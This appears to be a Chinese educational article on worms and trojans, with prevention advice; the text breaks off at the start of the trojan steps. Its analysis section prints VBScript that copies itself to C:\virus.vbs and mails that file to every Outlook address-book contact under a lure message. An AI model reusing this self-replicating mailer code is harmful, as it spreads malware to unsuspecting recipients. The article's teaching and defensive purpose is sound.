目录
一、蠕虫病毒概述 2
1、蠕虫病毒的定义 2
2、蠕虫病毒分类及特点 2
二、蠕虫病毒分析和防范 2
1、利用系统漏洞的恶性蠕虫病毒分析 3
2、对个人用户产生直接威胁的蠕虫病毒 3
3、个人用户对蠕虫病毒的防范措施 4
三、特洛伊木马攻击步骤 5
1、配置木马 5
2、传播木马 5
3、运行木马 6
四、杀毒软件 7
1、天网防火墙 7
2、卡巴斯基 8
3、Windows流氓软件清理大师 8
参考文献 8
恶意代码介绍及防范
一、蠕虫病毒概述
1、蠕虫病毒的定义
计算机病毒自出现之日起,就成为计算机的一个巨大威胁,而当网络迅速发展的时候,蠕虫病毒引起的危害开始显现!从广义上定义,凡能够引起计算机故障,破坏计算机数据的
程序统称为计算机病毒。所以从这个意义上说,蠕虫也是一种病毒!但是蠕虫病毒和一般的病毒有着很大的区别。对于蠕虫,现在还没有一个成套的理论体系,一般认为,蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文件寄生(有的只存在于内存中),对网络造成拒绝服务,以及和黑客技术相结合等等!
2、蠕虫病毒分类及特点
根据使用者情况可将蠕虫病毒分为2类,一种是面向企业用户和局域网而言,这种病毒利用系统漏洞,主动进行攻击,可以对整个互联网可造成瘫痪性的后果!以“红代码”,“尼姆达”,以及最新的“蠕虫王”为代表。另外一种是针对个人用户的,通过网络(主要是Email,恶意网页形式)迅速传播的蠕虫病毒,以爱虫病毒,求职信病毒为例。在这两类中,第一类具有很大的主动攻击性,而且爆发也有一定的突然性,但相对来说,查杀这种病毒并不是很难。第二种病毒的传播方式比较复杂和多样,少数利用了微软的应用程序的漏洞,更多的是利用社会工程学对用户进行欺骗和诱使,这样的病毒造成的损失是非常大的,同时也是很难根除的。
蠕虫病毒一般不采取利用pe格式插入文件的方法,而是复制自身在互联网环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而言,而蠕虫病毒的传染目标是互联网内的所有计算机。局域网条件下的共享文件夹,Email,网络中的恶意网页,大量存在着漏洞的服务器等都成为蠕虫病毒传播的良好途径。网络的发展也使得蠕虫病毒可以在几个小时内蔓延全球!可以预见,未来能够给网络带来重大灾难的主要必定是网络蠕虫!
普通病毒 | 蠕虫病毒 | |
存在形式 | 寄存文件 | 独立程序 |
传染机制 | 宿主程序运行 | 主动攻击 |
传染目标 | 本地文件 | 网络计算机 |
二、蠕虫病毒分析和防范
蠕虫病毒往往能够利用漏洞,这里的漏洞或者说是缺陷,我们分为2种,软件上的缺陷和人为上的缺陷。软件上的缺陷,如远程溢出,微软IE和Outlook的自动执行漏洞等等,需要软
件厂商和用户共同配合,不断的升级软件。而人为的缺陷,主要是指的是计算机用户的疏忽。这就是所谓的社会工程学(Social Engineering),当收到一封邮件带着病毒的求职信邮件时候,大多数人都会好奇去点击的。对于企业用户来说,威胁主要集中在服务器和大型应用软件的安全上,而个人用户而言,主要是防范第二种缺陷。
1、利用系统漏洞的恶性蠕虫病毒分析
在这种病毒中,以红代码、尼姆达和SQL蠕虫为代表!他们共同的特征是利用微软服务器和应用程序组件的某个漏洞进行攻击,由于网上存在这样的漏洞比较普遍,使得病毒很容易传播!而且攻击的对象大都为服务器,所以造成的网络堵塞现象严重!其实蠕虫病毒本身除了对网络产生拒绝服务攻击外,并没有别的破坏措施。但如果病毒编写者在编写病毒的时候加入破坏代码,后果将不堪设想!
2、对个人用户产生直接威胁的蠕虫病毒
对于个人用户而言,威胁大的蠕虫病毒采取的传播方式一般为(Email)以及恶意网页等等!
对于利用Email传播得蠕虫病毒来说,通常利用的是社会工程学(Social Engineering),即以各种各样的欺骗手段那诱惑用户点击的方式进行传播!
恶意网页确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用户在不知情的情况下打开含有病毒的网页时,病毒就会发作。这种病毒代码镶嵌技术的原理并不复杂,所以会被很多心怀不良企图者所利用,此外在很多黑客网站竟然有关于用网页进行破坏的技术论坛,并提供破坏程序代码下载,从而造成恶意网页的大面积泛滥,也使越来越多的用户遭受损失。
对于恶意网页,常常采取VB script和java script编程的形式!由于编程方式十分的简单,所以在网上非常的流行!VB script和java script是由微软操作系统的WSH(Windows Scripting HostWindows 脚本主机)解析并执行的,由于其编程非常简单,所以此类脚本病毒在网上疯狂传播,曾经疯狂一时的爱虫病毒就是一种VB script脚本病毒,然后伪装成邮件附件诱惑用户点击运行,更为可怕的是,这样的病毒是以源代码的形式出现的,只要懂得一点关于脚本编程的人就可以修改其代码,形成各种各样的变种。
下面以一个简单的脚本为例:
Set objFs=CreateObject (“Scripting.FileSystemObject”)(创建一个文件系统对象)objFs.CreateTextFile ("C:\",1)(通过文件系统对象的方法创建了TXT文件)如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘中创建一个TXT文件了。倘若我们把第二句改为:
objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")
就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我复制的功能,已经具备病毒的基本特征——自我复制能力。
此类病毒往往是通过邮件传播的,在VB script中调用邮件发送功能也非常的简单,病毒往往采用的方法是向Outlook中的地址薄中的邮件地址发送带有包含自身的邮件来达到传播目的,一个简单的实例如下:
Set objOA=Wscript.CreateObject ("Outlook.Application")(创建一个OUTLOOK应用的对象)
Set objMapi=objOA.GetNameSpace ("MAPI")(取得MAPI名字空间)
For i=1 to objMapi.AddressLists.Count(遍历地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)
objMail.Recipients.Add (objAddList. AddressEntries (j))(取得收件人邮件地址 )
objMail.Subject="你好!" (设置邮件主题,这个往往具有很大的诱惑性)
objMail.Body="这次给你的附件,是我的新文档!" (设置信件内容)objMail.Attachments.Add (“c:\virus.vbs")(把自己作为附件扩散出去 )
objMail.Send(发送邮件)
next
next
Set objMapi=Nothing(清空objMapi变量,释放资源)
set objOA=Nothing(清空objOA变量)
这一小段代码的功能是向地址簿中的用户发送,并将自己作为附件扩散出去。这段代码中的第一行是创建一个Outlook的对象,是必不可少的。在其下是一个循环,在循环中不断地向地址簿中的地址发送内容相同的信件。这就是蠕虫的传播性。由此可以看出,利用VB script编写病毒是非常容易的,这就使得此类病毒的变种繁多,破坏力极大,同时非常难以根除的!
3、个人用户对蠕虫病毒的防范措施
通过上述的分析,我们可以知道,病毒并不是非常可怕的,网络蠕虫病毒对个人用户的攻击主要还是通过社会工程学,而不是利用系统漏洞!所以防范此类病毒需要注意以下几点:
(1)使用合适的杀毒软件!在杀毒软件市场上,赛门铁克公司的Norton系列杀毒软件在全球具有很大的比例!经过多项测试,Norton杀毒系列软件脚本和蠕虫阻拦技术能够阻挡大部分病毒,而且对网页病毒也有相当强的防范能力!目前国内的杀毒软件也具有了相当高的水平。像瑞星,kv系列等杀毒软件,在杀毒软件的同时整合了防火强功能,对蠕虫兼木马程序有很大克制作用。
(2)经常升级病毒库,杀毒软件对病毒的查杀是以病毒的特征码为依据的,而病毒每天都层出不穷,尤其是在网络时代,蠕虫病毒的传播速度快,变种多,所以必须随时更新病毒库,以便能够查杀最新的病毒!
(3)提高防杀毒意识。不要轻易去点击陌生的站点,有可能里面就含有恶意代码!
当运行IE时,点击“工具→Internet选项→安全→ Internet区域的安全级别”,把安全级别由“中”改为“高” 。因为这一类网页主要是含有恶意代码的ActiveX或Applet、 JavaScript最新论坛网站源码的网页文件 ,所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以大大减少被网页恶意代码感染的几率。
(4)不随意查看陌生邮件,尤其是带有附件的邮件,由于有的病毒邮件能够利用IE和Outlook的漏洞自动执行,所以计算机用户需要升级IE和Outlook程序,及常用的其他应用程序!
三、特洛伊木马攻击步骤
用木马这种黑客工具进行网络入侵,从过程上看大致可分为六步,下面我们就按这六步来详细阐述木马的攻击原理。
1、配置木马
一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方面功能:
(1) 木马伪装:木马配置程序为了在服务端尽可能好的隐藏木马,会采用多种伪装手段,如修改图标、捆绑文件、定制端口、自我销毁等等。
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论